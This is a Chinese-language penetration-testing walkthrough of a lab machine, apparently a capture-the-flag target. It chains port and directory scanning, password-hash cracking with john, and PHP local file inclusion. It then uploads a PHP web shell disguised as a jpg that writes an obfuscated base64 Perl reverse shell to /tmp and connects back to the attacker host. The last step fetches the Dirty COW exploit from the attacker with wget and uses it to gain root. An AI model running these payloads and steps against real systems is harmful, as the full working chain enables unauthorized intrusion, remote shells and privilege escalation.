nmap -T4 -A -p- 192.168.206.146
这里我们借助工具dirsearch对该网站进行目录扫描
http://192.168.206.146/development/
然后再通过御剑进行扫描
http://192.168.206.146/index.html.bak
frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
通过工具john进行一下解密 把解密结果存储到相应文件中
cd /root
touch password.txt
nano password.txt
# frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
john password.txt > res.log
john --show password.txt > res.log
爆破成功 成功获得账户
frank
frank!!!
成功获得账户以后 接下来我们需要登录进入后台
http://192.168.206.146/development/
之后想起来之前还有一个8011的端口开放的http的服务 我们继续访问一下该服务
http://192.168.206.146:8011
接下来尝试继续使用御剑进行网站的扫描:
http://192.168.206.146:8011/api/
经过测试 只有files_api.php可以被成功访问
http://192.168.206.146:8011/api/files_api.php
接下来猜测 这个界面可以进行文件包含 同时参数名就是file 我们可以分别尝试get型和post型两种方式对其进行文件包含
接下来我们可以尝试使用伪协议查看一个这个界面对于参数的过滤规则 也就是查看其源代码
http://192.168.206.146:8011/api/files_api.php?file=php://filter/read=convert.base64-encode/resource=files_api.php
至此逻辑思路分析清晰 接下来我们需要进行文件上传 将格式修改为jpg格式 然后修MIME为image/jpeg 之后
<head>
<title>franks website | simple website browser API</title>
</head>
<?php
$file = $_POST['file'];
include($file);
$get_file = $_GET['file'];
if(isset($get_file)){
echo "<b>********* HACKER DETECTED *********</b>";
echo "<p>YOUR IP IS : ".$_SERVER['REMOTE_ADDR'];
echo "</p><p>WRONG INPUT !!</p>";
break;
}
if(!isset($file)){
echo "<p>No parameter called file passed to me</p>";
echo "<p>* Note : this API don't use json , so send the file name in raw format</p>";
}
/** else{
echo strcmp($file,"/etc/passwd");
echo strlen($file);
echo strlen("/etc/passwd");
if($file == "/etc/passwd"){
"HACKER DETECTED ..";
}
}**/
?>根据提示
http://192.168.206.146/development/uploader
文件上传成功以后我们注意到url变了
接下来我们也可以通过文件包含查看相应上传的过滤情况
http://192.168.206.146:8011/api/files_api.php
file=php://filter/read=convert.base64-encode/resource=/var/www/development/uploader/upload.php
<?php
$target_dir = "FRANKuploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
// Check if image file is a actual image or fake image
if(isset($_POST["submit"])) {
$check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
if($check !== false) {
echo "File is an image - " . $check["mime"] . ".";
$uploadOk = 1;
} else {
echo "File is not an image.";
$uploadOk = 0;
}
}
// Check if file already exists
if (file_exists($target_file)) {
echo "Sorry, file already exists.";
$uploadOk = 0;
}
// Check file size
if ($_FILES["fileToUpload"]["size"] > 500000) {
echo "Sorry, your file is too large.";
$uploadOk = 0;
}
// Allow certain file formats
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";
$uploadOk = 0;
}
// Check if $uploadOk is set to 0 by an error
if ($uploadOk == 0) {
echo "Sorry, your file was not uploaded.";
// if everything is ok, try to upload file
} else {
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to my uploads path.";
} else {
echo "Sorry, there was an error uploading your file.";
}
}
?>
至此也已经成功找到了相应的上传文件所在的位置
http://192.168.206.146/development/uploader/FRANKuploads/sqzr.jpg
接下来我们可以通过文件包含来执行这个jpg
http://192.168.206.146:8011/api/files_api.php
file=/var/www/development/uploader/FRANKuploads/sqzr.jpg
接下来可以通过工具进行链接!!
介于出现了木马不合适的问题 这里我们使用另一个木马
<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.206.128"; # 修改为你的攻击机的ip
$yourport = '8899'; # 修改为攻击机的监听端口
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>
这里我们重新进行文件上传 图片名字叫做muma.jpg
接下来我们在相应的攻击机器中使用nc进行监听
nc -lvp 8899
然后我们直接包含然后访问这个文件
http://192.168.206.146:8011/api/files_api.php
file=/var/www/development/uploader/FRANKuploads/muma.jpg
接下来在新的kali界面中 这里使用的是其中之一的脏牛提权的exp 还有很多可以直接提权的exp这里不多赘述了
searchsploit Dirty
cp /usr/share/exploitdb/exploits/linux/local/40839.c /root/crack.c
python -m SimpleHTTPServer
目标靶机
cd /tmp
wget http://192.168.206.128:8000/crack.c
gcc -pthread crack.c -o crack -lcrypt
./crack 123
123是随便输入的一个密码
之后就成功创建了一个密码是123的用户firefart
此时断开nc重新链接一下
